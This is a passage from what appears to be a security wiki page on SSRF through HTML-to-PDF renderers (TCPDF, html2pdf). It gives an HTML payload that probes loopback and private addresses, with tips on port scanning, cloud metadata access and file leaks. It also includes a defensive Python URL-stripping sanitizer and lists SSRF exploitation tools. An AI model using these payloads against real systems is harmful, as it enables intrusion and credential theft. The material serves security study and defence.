<html>
<body>
<img width="1" height="1" src="http://127.0.0.1:8080/healthz">
<link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
</body>
</html>
```
- TCPDF 6.10.0 issues several retries for each `<img>` resource, so a single payload can generate many requests (useful for timing-based port scans).
- html2pdf inherits TCPDF's `<img>` behaviour and adds CSS fetching inside Css::extractStyle(), which happily calls file_get_contents($href) after minimal scheme checks. Abuse it to hit loopback services, RFC1918 ranges, or cloud metadata endpoints.
- Combine this SSRF primitive with the HTML-to-PDF path traversal tricks to leak both internal HTTP responses and local files rendered into the PDF.
Defenders should strip external URLs before rendering or network-isolate the renderer; until then, treat PDF generators as blind SSRF proxies.
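As an added example of that stripping step (not code from TCPDF, html2pdf or the Positive Technologies write-up), this Python rebuilds the HTML before it reaches the renderer and drops every `<img>`/`<link>` whose URL is anything but an inline `data:` URI, reporting what was removed; the sample input is constructed from the snippet above.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tag/attribute pairs the renderer resolves over the network or filesystem.
FETCHING_ATTRS = {("img", "src"), ("link", "href")}


class RemoteRefStripper(HTMLParser):
    """Rebuild the HTML, dropping <img>/<link> tags whose URL is anything but a data: URI."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.dropped = []

    @staticmethod
    def _fetch_target(tag, attrs):
        for name, value in attrs:
            if (tag, name) in FETCHING_ATTRS and value is not None:
                # Only inline data: content is allowed; http(s), file, relative
                # paths and anything else would make the renderer fetch it.
                if urlsplit(value.strip()).scheme.lower() != "data":
                    return value
        return None

    def handle_starttag(self, tag, attrs):
        target = self._fetch_target(tag, attrs)
        if target is not None:
            self.dropped.append(target)
            return
        self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):  # <link ... /> must not emit a </link>
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


def sanitize(html):
    """Return (sanitized html, list of URLs removed) for HTML that is about to be rendered."""
    p = RemoteRefStripper()
    p.feed(html)
    p.close()
    return "".join(p.out), p.dropped


# Constructed input: the two probes from the snippet above plus a harmless inline image.
SAMPLE = """<html>
<body>
<img width="1" height="1" src="http://127.0.0.1:8080/healthz">
<link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
<img src="data:image/png;base64,iVBORw0KGgo=">
</body>
</html>"""
```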
SSRF Exploitation in the cloud
If you find an SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials:
Platforms vulnerable to SSRF
Several known platforms contain or have contained SSRF vulnerabilities; check them in:
Tools
SSRFMap
Tool to detect and exploit SSRF vulnerabilities
Gopherus
This tool generates Gopher payloads for:
- MySQL
- PostgreSQL
- FastCGI
- Redis
- Zabbix
- Memcache
remote-method-guesser
remote-method-guesser is a Java RMI vulnerability scanner that supports attack operations for most common Java RMI vulnerabilities. Most of the available operations support the --ssrf option, to generate an SSRF payload for the requested operation. Together with the --gopher option, ready-to-use gopher payloads can be generated directly.
SSRF Proxy
SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
To practice
References
- https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
- https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/
- https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies
- Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?
- Tenable – SSRF Vulnerability in Java TLS Handshakes That Creates DoS Risk
- RFC 5280 §4.2.2.1 Authority Information Access